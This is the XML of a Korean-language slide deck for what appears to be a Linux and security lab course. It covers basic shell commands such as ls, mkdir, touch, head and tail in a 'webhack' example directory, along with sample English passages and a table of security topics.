
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp"/>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81" r:id="rId5"/>
    <p:sldId id="380" r:id="rId6"/>
    <p:sldId id="382" r:id="rId7"/>
    <p:sldId id="373" r:id="rId8"/>
    <p:sldId id="374" r:id="rId9"/>
    <p:sldId id="375" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="286" r:id="rId24"/>
    <p:sldId id="355" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="292" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="294"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5" r:id="rId45"/>
    <p:sldId id="316" r:id="rId46"/>
    <p:sldId id="317" r:id="rId47"/>
    <p:sldId id="311" r:id="rId48"/>
    <p:sldId id="312" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
    <p:sldId id="314" r:id="rId51"/>
    <p:sldId id="318" r:id="rId52"/>
    <p:sldId id="319" r:id="rId53"/>
    <p:sldId id="320" r:id="rId54"/>
    <p:sldId id="321" r:id="rId55"/>
    <p:sldId id="322" r:id="rId56"/>
    <p:sldId id="323" r:id="rId57"/>
    <p:sldId id="324"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5" r:id="rId78"/>
    <p:sldId id="346" r:id="rId79"/>
    <p:sldId id="347" r:id="rId80"/>
    <p:sldId id="348" r:id="rId81"/>
    <p:sldId id="349" r:id="rId82"/>
    <p:sldId id="350" r:id="rId83"/>
    <p:sldId id="351" r:id="rId84"/>
    <p:sldId id="352" r:id="rId85"/>
    <p:sldId id="353" r:id="rId86"/>
    <p:sldId id="354" r:id="rId87"/>
    <p:sldId id="356" r:id="rId88"/>
    <p:sldId id="357" r:id="rId89"/>
    <p:sldId id="358" r:id="rId90"/>
    <p:sldId id="359" r:id="rId91"/>
    <p:sldId id="360" r:id="rId92"/>
    <p:sldId id="361" r:id="rId93"/>
    <p:sldId id="362" r:id="rId94"/>
    <p:sldId id="363" r:id="rId95"/>
    <p:sldId id="364" r:id="rId96"/>
    <p:sldId id="367" r:id="rId97"/>
    <p:sldId id="368" r:id="rId98"/>
    <p:sldId id="370" r:id="rId99"/>
    <p:sldId id="372" r:id="rId100"/>
    <p:sldId id="369" r:id="rId101"/>
    <p:sldId id="376" r:id="rId102"/>
    <p:sldId id="377" r:id="rId103"/>
    <p:sldId id="378" r:id="rId104"/>
    <p:sldId id="379" r:id="rId105"/>
    <p:sldId id="371" r:id="rId106"/>
    <p:sldId id="268" r:id="rId107"/>
    <p:sldId id="365" r:id="rId108"/>
    <p:sldId id="366" r:id="rId109"/>
    <p:sldId id="296" r:id="rId110"/>
    <p:sldId id="325" r:id="rId111"/>
    <p:sldId id="290" r:id="rId1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E"/>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3" d="100"/>
          <a:sy n="163" d="100"/>
        </p:scale>
        <p:origin x="150"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2021-02-20</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2021-02-20</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00.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6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.jpeg"/><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https://www.youtube.com/watch?v=IS3UpC121bI"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09.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3.bmp"/><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7.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.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10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0.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2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92.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide87.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.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60.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide34.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.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slide" Target="slide47.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide77.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide40.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide27.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide38.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.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4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40.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44.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gif"/><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47.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.gif"/><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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.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bmp"/></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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.gif"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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3.bmp"/><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76.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.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78.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.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81.gif"/><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88.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.bmp"/></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4.bmp"/><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8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.bmp"/><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03.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.bmp"/></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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.bmp"/><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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.bmp"/><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2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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.bmp"/><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15.bmp"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.bmp"/><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0.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.bmp"/><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23.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.bmp"/><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6.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.pn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31.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.bmp"/></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136.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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140.bmp"/><Relationship Id="rId2"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23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide89.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.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88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.bmp"/><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slide" Target="slide8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 Target="slide9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 Target="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94.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide93.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide96.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92.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.jpeg"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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9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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.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slide" Target="slide96.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757048151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4678807"/>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시스템 보안로그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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>R-command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Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, Wireshark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디버거</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(GDB)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레이스 컨디션</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Race 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4"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with liberation, the Naval Academy was opened to foster elite naval officers who will protect the seas of the motherland by Admiral Son Won-il and other marine pioneers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland, and are still striving to raise the status of Korea in all parts of the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>We look forward to your continued interest and support for our Naval Academy.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After receiving an order from the Senate to dismantle all of the corps in Gaul and appear in Rome, he led the corps to cross the Rubicon River. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>At the time, the Rubicon River was the border between Rome and the provinces, and it was not allowed to cross the river with troops. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Caesar said his dice were thrown as he crossed this river.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3514888310"/>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6415155" y="1690688"/>
            <a:ext cx="3977200" cy="4971502"/>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실습실 사진</a:t>
            </a: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5209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472169459"/>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작업중인 디렉토리 정보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디렉토리 생성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최근 업데이트 일자를 현재 시간으로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head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앞부분을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뒷부분을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776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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/example</a:t>
              </a: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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>]#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6F81AA95-3EE1-4610-BE09-C37E81D839A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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</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 -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>12</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxrw-rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 303  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 index.html</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439  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 303  8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xss.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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 -a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  ..  index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</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example]# ls -al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20</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4096  8</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23  2017 .</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7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4096  3</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27  2018 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rwxrw-rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>- 1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303  7</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3  2017 index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-r--r-- 1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439  7</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3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>--r-- 1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303  8</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23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
